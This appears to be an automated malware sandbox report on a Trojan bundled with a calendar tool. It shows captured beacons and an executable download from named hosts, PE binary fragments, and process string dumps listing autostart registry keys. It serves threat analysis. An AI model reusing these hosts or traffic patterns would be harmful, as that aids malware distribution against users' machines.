Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:07 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:07 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success..



POST /online.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY5RjM1RkI3NDg3MjVBQkJGOURFRjY1OTE3NTJFQzlEOEE1NkQ4QTVCOUNGNzUxQ0IwRkJDRjlERTMwNDgxMTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 500 Internal Server Error
Connection: close
Date: Tue, 03 May 2016 01:55:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 3030
<html>..    <head>..        <title>Runtime Error<
/title>..        <style>..         body {font-family:"Verdana
";font-weight:normal;font-size: .7em;color:black;} ..         p {font-
family:"Verdana";font-weight:normal;color:black;margin-top: -5px}..   
      b {font-family:"Verdana";font-weight:bold;color:black;margin-top
: -5px}..         H1 { font-family:"Verdana";font-weight:normal;font-s
ize:18pt;color:red }..         H2 { font-family:"Verdana";font-weight:
normal;font-size:14pt;color:maroon }..         pre {font-family:"Lucid
a Console";font-size: .9em}..         .marker {font-weight: bold; colo
r: black;text-decoration: none;}..         .version {color: gray;}..  
       .error {margin-bottom: 10px;}..         .expandable { text-deco
ration:underline; font-weight:bold; color:navy; cursor:hand; }..      
  </style>..    </head>..    <body bgcolor="white">.
.            <span><H1>Server Error in '/' Application.<
;hr width=100% size=1 color=silver></H1>..            <h2&
gt; <i>Runtime Error</i> </h2></span>..       
     <font face="Arial, Helvetica, Geneva, SunSans-Regular, sans-se
rif ">..            <b> Description: </b>An application
 error occurred on the server. The current custom error settings for t
his application prevent the details of the application error from bein
g viewed remotely (for security reasons). It could, however, be viewed
 by browsers running on the local server machine...            <
<<< skipped >>>


GET /CalendarTool_Setup_En_pure_Release_calendarbase[2015-12-25.16.42].exe HTTP/1.1
User-Agent: HTTP_CLIENT
Host: download.intechnical.online
Connection: Keep-Alive


HTTP/1.1 200 OK
Date: Tue, 03 May 2016 01:56:01 GMT
Server: PWS/8.1.36
X-Px: rf-ht h0-s1105.v0-mow ( h0-s1170.v0-mow), ht-d h0-s1170.v0-mow.cdngp.net
ETag: "a612003-5bb3c8-529aa33cff880"
Cache-Control: max-age=604800
Expires: Sun, 08 May 2016 19:41:41 GMT
Age: 108860
Accept-Ranges: bytes
Content-Length: 6009800
Content-Type: application/x-msdownload
Last-Modified: Tue, 19 Jan 2016 06:44:34 GMT
Connection: keep-alive
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8
...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8.......
.PE..L.....GO.................t...z...B...8............@..............
...................c.\...@.................................@..........
..\..........@.[......`...............................................
........................................text....r.......t.............
..... ..`.rdata..n .......,...x..............@[email protected].... ...........
[email protected]....\.
......^..................@[email protected][email protected].
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U....\.}..t .}.F.E.u..H
[email protected][email protected]...
..@..}[email protected]... M..........M........E...FQ.....NU
..M.......M...VT..U........FP..E...............E.P.M...H.@..E..P.E..E.
[email protected]}[email protected].}.j.W.E......E.....
[email protected][email protected][email protected] [email protected].
u.....@._^3.[.....L$....G...i. @...T.....tUVW.q.3.;5..G.sD..i. @...D..
S.....t.G.....t...O..t .....u...3....3...F. @..;5..G.r.[_^...U..QQ
<<< skipped >>>


POST /iplookup/iplookup.php HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: int.dpool.sina.com.cn


HTTP/1.1 200 OK
Server: Tengine
Date: Tue, 03 May 2016 01:55:47 GMT
Content-Type: text/html; charset=gbk
Content-Length: 20
Connection: close
DPOOL_HEADER: tyr106
SINA-LB:aGEuMTE4LmcyLnlmLmxiLnNpbmFub2RlLmNvbQ==
SINA-TS:OWJmMjk2Y2UgMCAwIDAgNSAwCg==
1.-1.-1...............



POST /anzhuang.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDM0QTgwQkI4OUI1QTIxODYwRjFBQjM1RjIwMThCOUYyMTkzQjZFODExM0U2MENDMjc5NERDNDQwM0EzNzVGNzZCODJCODdDRUJGMkEwNUEwQjU4MDVBMzYxRjE5QkFBRkY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /xiezai.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUY4QzMwQkJBRUIwNzA1QTEyNzBDM0RFQTk1OTJDN0ZCMzdDQTY3QzRGN0I0RDA2NDAzMzc0M0IyRTYzQjk0OTY= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:56:00 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /down.aspx?Nzc5QzYxN0M3QTlCNzZEMkM2NDlCQjI1MUQzNzMyRDNGNEZFRUI2MDhGNzRFNjdCODFERTEzNUZDQUQ1Q0FGMUIyMDBFNEQ5MkU5RjlEN0UzQjI1NTYxMzcwMzQxOTczMEIwNkU4RDJCMTk4QUU0QUNBQkQxQzM1RTA0QzVBQzU= HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: xiaobingdou.com


HTTP/1.1 200 OK
Connection: close
Date: Tue, 03 May 2016 01:55:58 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 4.0.30319
Cache-Control: private
Content-Length: 0



POST /cgi-bin-py/calendar_install.cgi HTTP/1.1
Content-Type: multipart/form-data; boundary=26BC8369D6944cca92B4EAA85508054A
User-Agent: BDI18N
Host: VVV.theadvancedcalendar.com
Content-Length: 450
Connection: Keep-Alive

--26BC8369D6944cca92B4EAA85508054A
Content-Disposition: form-data; name="ufile01"; filename="boundary"
Content-Type: application/octet-stream

/x..g^[email protected]..>./..)<.Bq..mb.YoJ~..#=.DuT.v*..n^tP.zf.N'..vv..c.lH..$..oT.-).P(.vD.7(.NaL.
?.:f.7..gh.
4.(...n. P.9|.RaL.ft.D:R.C.#3.a..:x.H;L}A.f&.S7..!).Pq^...ok.L...=4.P(Ml^.tf..5..v`.H&^>..~d.n"..v`..o.;..~r..oT.-*.H0^(..wU.N0..86..o.'..fw=1E38566

--26BC8369D6944cca92B4EAA85508054A--

HTTP/1.1 200 OK
Content-Type: text/plain
Date: Tue, 03 May 2016 01:56:05 GMT
Server: Apache
Content-Length: 7
Connection: keep-alive
successHTTP/1.1 200 OK..Content-Type: text/plain..Date: Tue, 03 May 20
16 01:56:05 GMT..Server: Apache..Content-Length: 7..Connection: keep-a
live..success..



POST /open/51486.ini HTTP/1.1
Content-Length: 0
Connection: Close
User-Agent: User-Agent:Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko
Host: wsxc123.cc


HTTP/1.1 405 Method Not Allowed
Allow: GET, HEAD, OPTIONS, TRACE
Content-Type: text/html
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 03 May 2016 01:55:49 GMT
Connection: close
Content-Length: 1202
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>405 - ..
.................. HTTP ......</title>..<style type="text/css
">..<!--..body{margin:0;font-size:.7em;font-family:Verdana, Aria
l, Helvetica, sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px
 10px 15px;} ..h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:
1.7em;margin:0;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;
color:#000000;} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 
2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;..backgr
ound-color:#555555;}..#content{margin:0 0 0 2%;position:relative;}...c
ontent-container{background:#FFF;width:96%;margin-top:8px;padding:10px
;position:relative;}..-->..</style>..</head>..<body&
gt;..<div id="header"><h1>..........</h1></div>
;..<div id="content">.. <div class="content-container"><
;fieldset>..  <h2>405 - .................... HTTP ......</
h2>..  <h3>..................................................
..(HTTP ....)..</h3>.. </fieldset></div>..</div&g
t;..</body>..</html>....
<<< skipped >>>






The Trojan connects to the servers at the folowing location(s):







Explorer.exe_660:




.text
`.data
.rsrc
@.reloc
ADVAPI32.dll
BROWSEUI.dll
GDI32.dll
KERNEL32.dll
NTDLL.DLL
msvcrt.dll
ole32.dll
OLEAUT32.dll
SHDOCVW.dll
SHELL32.dll
SHLWAPI.dll
USER32.dll
UxTheme.dll
FTSSh
t0SSh
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system
SShwk
98~%SP
ExplorerStartMsgLoop
PSSh;
6SSSSh
SSSSh
SPSSSShL
u%SSh
t.WWWW
xpsp2res.dll
xpsp3res.dll
tbSSh
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartMenu
Software\Microsoft\Windows\CurrentVersion\Explorer\StartMenu\StartPanel
kernel32.dll
GetSystemWindowsDirectoryW
NetGetJoinInformation
WINMM.dll
SETUPAPI.dll
WINSTA.dll
OLEACC.dll
USERENV.dll
ntdll.dll
RegEnumKeyExW
RegNotifyChangeKeyValue
RegOpenKeyExA
RegEnumKeyW
RegCloseKey
RegCreateKeyW
RegQueryInfoKeyW
RegOpenKeyExW
RegCreateKeyExW
OffsetViewportOrgEx
GetViewportOrgEx
SetViewportOrgEx
SetProcessShutdownParameters
GetProcessHeap
GetWindowsDirectoryW
CreateIoCompletionPort
ShellExecuteExW
SHRegCloseUSKey
SHRegCreateUSKeyW
AssocQueryKeyW
SHRegOpenUSKeyW
SHDeleteKeyW
TileWindows
ExitWindowsEx
RegisterHotKey
UnregisterHotKey
EnumChildWindows
GetKeyState
GetAsyncKeyState
CascadeWindows
MsgWaitForMultipleObjects
EnumWindows
explorer.pdb
name="Microsoft.Windows.Shell.explorer"
version="5.1.0.0"
<description>Windows Shell</description>
name="Microsoft.Windows.Common-Controls"
version="6.0.0.0"
publicKeyToken="6595b64144ccf1df"
]]"```^]]\
3333333330
3333330
333333334
)@.   '5 !*
.DEHHF>?/
2<===@@=
&$%Uooqkezs
['$$#%&(4
3333333333333333333
33333333333330
7'''')) 
3'')))33.
222`444(555
%%%{///-
000000000
00000000
`[66...00
0000000
`]66./.000
/./././././././.
66///0000
0000000000000
0000000000
6666,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,0.010.010.010.010.010.010.010.010.010.010.001
4366666666K,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6,6.010.010.010.010.010.010.010.010.010.010.000
:;<;:;<;:;<;:;<;:;<0
)   )   )   )   )
|2222'2'2'2'2'2'2'2'2'2'2'2'2'2'2'2',),),),),),),),),),),),),),),),),),),),),),, 
22222222222
3333333
.SB99;;;99twv}ut{oxt~
.SB;;;:::2:w}{{qddgghg
" """ """ """ """ "" #
""" """ """ "#
.SG>''';;9::p
:5:5:5:5:5:5:5:5:5:5#"
# # # # # # # # # # # # # # # # # # # # # ##$
( # # # # # # # # # # # # # # # # # # # # ###
1232123212321232123
(&(((&(((&(((&(((&((&&)
&(((&(((&(((&()
`,''')))
'4,4'4,4'4,4'4,4'4,4)(
55///0000
5555-5-5-5-5-5-5-5-5-5-5-5-5-5-5-5-0
555555555
55555555
5555555
14441444144414441
4343434343434343
5555555555555
5555555555
-,-,-,-,-,-,-,-,-,-,-*.
..............................JFJFJFJFJFJFJFJFJFJFJ.-
{22*2*2*2*2*2*2*2*2*2*2*2*2*2*2*2*.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-../
|ujjjjuhF..BBBBBBBBBBBBT
~j|F.BB*BBB*BBB*Bwop
&!!!&!!!&
44466666
44444444416
4446666
66666666
|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= 
|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= 
DDDDE%CTDD@
A%US$
%UUUU
%%UUU
33U
""2222!!
!"!"%UUR""
!""!"#2"""
"!!"#3"!"
dnnnnn:n.nfCnmddddd
////;/;;88
;888;;!/
!//!!;;^
:;:!::!!!
.88.88.8
.N.NN.M
::8.8...
:::!;;:!
//!!;888
.8.8.88...
:;!::!!;!//!;
!!;:!!::
.88..8..
!!:::/^!
!;/;!;;;!!!:
.8:!!!!^
!!:;:::..
/:!^^!;{8{../
...:::.-
**6***66*6**6566*5666 ,
6*6666*6*6 655*65
6*65 56*5 55  555 *5  6
555( 55 (5 5(  
76 5   66  555*677
6*6 5 5(5 (55( '5((5 (556 ('5
665**6(('S((((((S(((]('((@('SS((S(((((((6C-.NEC66S5sU
555(555(5((5(5(5(
5 5 5 5555 (555(555'(((5(5('55(((
((''('5'5(5('('('('('((''('(((@(((('&(((&
%&&%&&&&3>&3&3&33&3&3333&&3>3333
'(3&'&3&
3&33&&((
3323>33>%>3%>3>33>3%3&%
*5'(('((&@3(
,63%3>323>3%>&>33323>>%>
3(3'(((@@'5('@(@(&('(
>2>323%>3
75((((@3&333&3&&&%&3&&3&33>33%3>23%>3
>2%$32%>2>%>2$3>
3&%&&3&33>3>33
3>%>3%&3$23>23$2>2%$>2>
)4433((&(&('*
('((((''(**6(('' *
32323>3>
2$%>22%>%3' (
&(&''((5(5 *
'(&(&((&('''
&&%&3&&%3%
2%>22>22
5''3(((3(('&(&'&
3%%3%3%2#$
22$22$2%$22$2%2%$2%$2$222%$22
&>2$2$2$222$22$%%
:7'((('(3('(3(&(&
222222222222
22222222222222
222222222222222
22$22$22$22$
&(%3%&&&&3&&&3%3
222222222222222222
&&(&3(&(&'('((3'(&&
2222222
22$<$$2$22$%
&&(3(3('(&'
222"2212
22<2<22"
(&(3(3((
((565 ((( 6
333&33(&&
'(('('(('( 
 '&%%"$
2"2"22"2
2222<2"222
"2"22<2<22
2%('(3'32222?&'
2"2"2"121212<
2"2"2$"?
%%22%2
&3(3(3((&
"2"<"2<2<
<2<"<"<"<
1"?((&21
<?<?22<$2
2%""22&&
2<2$$2222
'&('(3(''
((%%%"
5(3%"%
"2%5*67
))) ))))
""**<****"""
"*<<<<*"
#2#---2222-222442-
--&#-(-%
$/222(--444222!
#&-221269924999;
&$-22-($2%
#(2---222622212-
#2221299629968
#&--%#(2##!
-222422422426662-%
"2-##&
!##-#&#-&&#%---#---#&-219662%
$&-(151,44.9
&1242662-
-(..19.19
,4492.12
12-$-,-,
-, $$----
#%#-15/-&
-,(,,(,(,
$$11651566/,$&&
,2592&&&-
2466/!$$
""*<*"****""
) '????[
&&&$-556>>61,,5994511-
$(//$$$(6>6/,$,-$
#$-22692/,,$,-&
-266661..4514#
&,2-&&##
&-222,22--#
#&&---2-,-&$&(,,291.566..BNNNTNNNNNAABIAA88
&!#&!-##
&#--//11468>885882&
$266961$&--$&%
,1661,!-((#
&$,4255$,92
&$,44..&
""**""***""
"****<*<<**"
"**""""*""""
&-569./-,16522$
.BAA=86546888=AAAEAAEMNRMQQSWZZ\]gk__m__\
bTRHHHHHQQHQJQWJSSSSSSSSSSSSSSSSWWSSSS\\V]VZW8,.FW]\\]\]\]\\ZZ\\WFR>38(
.BTTkgn]ktvgmvvvvvmvvvsvzzzyzyzyzyyyzmkkkkkZSRA816;F87
yzyzyzym^Z]WN3   $&$.Wt\
""*"""****""""
"***"**""**<**"
$5612,.2,
&$$,,,5]
$]t.Ft
7%8U8
3 303<3]3
2<3
8 8$8(8,8084888<8}8
5%5,575{6
<,<0<4<8<
7 7$7(7,70747
rundll32.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced
SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage
Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced
::{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}
::{2559a1f1-21d7-11d4-bdaf-00c04f60b9f0}
::{D20EA4E1-3957-11d2-A40B-0C5020524153}
::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}
{208D2C60-3AEA-1069-A2D7-08002B30309D}
{20D04FE0-3AEA-1069-A2D8-08002B30309D}
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites
{450D8FBA-AD25-11D0-98A8-0800361B1103}
CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\RunOnce
Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
Software\Microsoft\Windows\CurrentVersion\Explorer\DontShowMeThisDialogAgain
Software\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz
\\.\WMIDataDevice
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
Software\Microsoft\Windows NT\CurrentVersion\Windows
ExplorerIsShellMutex
desk.cpl
Software\Microsoft\Windows\CurrentVersion\Explorer
tourstart.exe
tourstart.exe,0
Microsoft.OfferTour
WINWORD.EXE
Software\Microsoft\Windows\CurrentVersion\Applets
Software\Microsoft\Windows\CurrentVersion\Applets\Tour
explorer.exe,9
Microsoft.FixScreenResolution
shell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociation
Software\Microsoft\Windows NT\CurrentVersion
shell:::{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0}
Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage
Software\Microsoft\Windows\CurrentVersion\Policies\Explorer
DDEEXECUTESHORTCIRCUIT
http\shell
IEXPLORE.EXE
Software\Microsoft\Windows\CurrentVersion\Explorer\Streams\Desktop
Software\Microsoft\Windows\CurrentVersion\RunOnceEx
comctl32.dll
Software\Microsoft\Windows\Internet Settings
AutoConfigURL
system.ini
AppEvents\Schemes\Apps\.Default\%s\.current
Software\Microsoft\Windows\CurrentVersion\Explorer\TrayNotify
MSShellRunDlgReady
res://mys.dll/mys.hta /explorer
mshta.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\Welcome
Software\Microsoft\Windows\CurrentVersion\Explorer\Tips
SOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\MYS
cys.exe
SOFTWARE\Microsoft\Windows NT\CurrentVersion\srvWiz
install.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel
OUTLOOK.EXE
explorer.exe,16
iernonce.dll
WININET.DLL
UpdateURL
WindowsUpdate
HWND%x
Software\Microsoft\Windows\CurrentVersion\OemStartMenuData
fldrclnr.dll,Wizard_RunDLL
iexplore.exe
winbrand.dll
Software\Microsoft\Windows\CurrentVersion\Explorer\Remote\%d
shell32.dll
nusrmgr.cpl ,initialTask=ChangePicture
NewExeName
Windows
ediskeer.dll
timedate.cpl
Software\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\LastVisitedMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\OpenSaveMRU
Software\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRU
Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU
Software\Microsoft\Internet Explorer\TypedURLs
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Calculator.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Games\Solitaire.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Paint.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\WordPad.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\System Tools\Files and Settings Transfer Wizard.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Windows Movie Maker.lnk
%USERPROFILE%\Start Menu\Programs\Accessories\Tour Windows XP.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Windows Messenger.lnk
%USERPROFILE%\Start Menu\Programs\Windows Media Player.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\MSN.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Get Online with MSN.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Get Going with Tablet PC.lnk
%ALLUSERSPROFILE%\Start Menu\Set Program Access and Defaults.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Windows Journal.lnk
%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Media Center\Media Center.lnk
%USERPROFILE%\Start Menu\Programs\Internet Explorer.lnk
Software\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanel
TSAppCMP.DLL
netapi32.dll
%SystemRoot%\system32\restore\rstrui.exe
RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL ?0x%X?%s
RunDLL32.EXE
%s%d%s
Software\Microsoft\Windows\CurrentVersion\Policies\System
settings.dll
explorer.exe "
explorer.exe /e, "
WindowsLogon
WindowsLogoff
%s %s
Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count
uAppWiz.Cpl
\explorer.exe
Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu
::{20D04FE0-3AEA-1069-A2D8-08002B30309D}
taskmgr.exe
ShellExecute
Software\Microsoft\Windows\CurrentVersion\Explorer\AppKey\%d
\WindowsShell.Manifest
Get Online with MSN.lnk
Set Program Access and Defaults.lnk
Link%d
OEM%d
Software\Microsoft\Windows\CurrentVersion\SMDEn
::{D20EA4E1-3957-11d2-A40B-0C5020524152}
%WinDir%\Explorer.exe
There is a file or folder on your computer called "%s" which could cause certain applications to not function correctly. Renaming it to "%s" would solve this problem. Would you like to rename it now?
Ca&scade Windows
Tile Windows &Horizontally
Tile Windows V&ertically
&Windows Security...
&Help and Support
&Log Off %s...
Windows Explorer
6.00.2900.5512 (xpsp.080413-2105)
EXPLORER.EXE
Windows
Operating System
6.00.2900.5512
Keep the &taskbar on top of other windows
To remove records of recently accessed documents, programs, and Web sites, click Clear.
Windows displays icons for active and urgent notifications, and hides inactive ones. You can change this behavior for items in the list below.
Select this option to use the menu style from earlier versions of Windows.
6There is not enough memory to complete this operation.8Unable to run command.
The folder '%1' has been removed.WMy Computer or Windows Explorer has not been properly initialized yet. Try again later.
&Undo %s
Windows is running in safe mode.
This special diagnostic mode of Windows enables you to fix a problem which may be caused by your network or hardware settings. Make sure these settings are correct in Control Panel, and then try starting Windows again. While in safe mode, some of your devices may not be available.
startRThere was an internal error and one of the windows you were using has been closed.
Restrictions{This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.
&Show Open Windows
Windows was unable to change the display settings for the new configuration. Return the computer to the previous state, shut down Windows, and restart the computer in the desired configuration.
There may be a problem with your display settings if you continue. To safely change to a new configuration, you should shut down Windows and restart the computer in the desired configuration. Do you want to continue anyway?
This pre-release version of "Internet Explorer 4.0" Desktop/Explorer has expired. Please update to the latest release of "Internet Explorer 4.0" from WWW.MICROSOFT.COM
helpctr.exe>-FromStartHelp
Take a tour of Windows XP
NOpens a window where you can pick search options and work with search results.aOpens a central location for Help topics, tutorials, troubleshooting, and other support services.
/Opens a program, folder, document, or Web site.
Provides options for closing your programs and logging off, or for leaving your programs running and switching to another user.lProvides options for turning off or restarting your computer, or for activating Stand By or Hibernate modes.RDisconnects your session. You can reconnect to the session when you log on again.
&Windows Security
iOpens the My Documents folder, where you can store letters, reports, notes, and other kinds of documents./Displays recently opened documents and folders.KOpens the My Music folder, where you can store music and other audio files.]Opens the My Pictures folder, where you can store digital photos, images, and graphics files.zGives access to, and information about, the disk drives, cameras, scanners, and other hardware connected to your computer.MGives access to, and information about, folders and files on other computers.8Connects to other computers, networks, and the Internet.

rundll32.exe_1976:




.text
`.data
.rsrc
msvcrt.dll
KERNEL32.dll
NTDLL.DLL
GDI32.dll
USER32.dll
IMAGEHLP.dll
rundll32.pdb
.....eZXnnnnnnnnnnnn3
....eDXnnnnnnnnnnnn3
...eDXnnnnnnnnnnnn,
.eDXnnnnnnnnnnnn,
%Xnnnnnnnnnnnnnnn1
O3$dS7"%U9
.manifest
5.1.2600.5512 (xpsp.080413-2105)
RUNDLL.EXE
Windows
Operating System
5.1.2600.5512
YThere is not enough memory to run the file %s.
Please close other windows and try again.
9The file %s or one of its components could not be opened.
0The file %s or one of its components cannot run.
MThe file %s or one of its components requires a different version of Windows.
UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"
Error in %s
Missing entry:%s
Error loading %s

CalendarServ.exe_3180:




.text
`.rdata
@.data
.rsrc
@.reloc
Product_CloudMgr_Public_Exe
Product_CloudMgr_Exe
Product_AppsRobo_Public_Exe
Product_AppsRobo_Exe
Product_Allinone_Public_Exe
Product_Allinone_Exe
Product_Newspark_Public_Exe
Product_Newspark_Exe
Product_Spark_Public_Exe
Product_Spark_Exe
Product_Ime_Public_Exe
Product_Ime_Exe
Product_AppStore_Public_Exe
Product_AppStore_Exe
Product_Pcf_Public_Exe
Product_Pcf_Exe
Product_Bav_Public_Exe
Product_Bav_Exe
ADVAPI32.DLL
Please contact the application's support team for more information.
- Attempt to initialize the CRT more than once.
- CRT not initialized
- floating point support not loaded
operator
GetProcessWindowStation
USER32.DLL
D:\jenkins\workspace\calendar\Release\Service.pdb
SHLWAPI.dll
GetProcessHeap
KERNEL32.dll
RegCloseKey
RegOpenKeyExW
RegCreateKeyW
RegEnumKeyW
ReportEventW
ADVAPI32.dll
SHELL32.dll
WTSAPI32.dll
USERENV.dll
VERSION.dll
GetCPInfo
GetConsoleOutputCP
RegCreateKeyExW
PSAPI.DLL
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
<requestedExecutionLevel level="asInvoker" uiAccess="false"></requestedExecutionLevel>
2"2S2_2
1$1(1,1014181<1@1
,2024282
@ntdll.dll
kernel32.dll
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
KERNEL32.DLL
mscoree.dll
AEVPTask.dll
btguarduser.dll
Report.exe
InstallHelper.exe
DeskBandDLL.dll
btguard.sys
btguard64.sys
123.exe
Software\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}
rundll32.exe
